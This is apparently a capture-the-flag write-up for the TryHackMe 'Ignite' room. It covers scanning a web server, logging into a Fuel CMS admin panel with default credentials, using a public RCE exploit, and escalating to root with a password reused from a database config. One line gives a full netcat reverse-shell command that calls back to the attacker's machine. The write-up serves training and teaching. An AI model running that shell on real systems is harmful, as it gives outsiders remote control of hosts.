{THM}Ignite
Last updated
Last updated
A new start-up has a few issues with their web server. Root the box! Designed and created by DarkStar7471, built by Paradox.
Enjoy the room!
First step always start with scanning the machine to find any open port.
For this machine, only port 80 are open as per mention in title (Web Server).
Are you notice something there??.
It shown directory which is robots.txt and /fuel.
This is landing page for this machine. Let check directory given.
let proceed with credential given early.
VOILLLA!!!. We in as admin dashboard. Let see around what we can do and in same time let find any vulnerability for fuel cms version 1.4.
This version can be exploit. (always choose the latest version of exploit.) In this case, i take RCE3.
Just like that, we in as www-data. Let make it stable using netcat.
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_MACHINE 1234 >/tmp/f
Next in our listener, make stable connection using pty.
Since we got already stable connection, let move around to find our objective. Like always. Let find user flag.
Remember this at landing page, it actually hint for escalate user. For this time, I will escalate using config setup in database. Lucky the super user and password are same.
That is.. Next find root flag then DONE!!.
Best suggestion is, to update Fuel CMS to latest version.
FUEL CMS is a content management system (CMS) based on the Codelgniter framework. The βfilterβ parameter of pages/select/ and the βdataβ parameter of preview/page in FUEL CMS version 1.4.1 has injection vulnerabilities. The vulnerability stems from the fact that the network system or product lacks the correct verification of the user input data during the operation process.
Always check for cve/vulnerability of version web server.
Copy exploit-db into current local file.
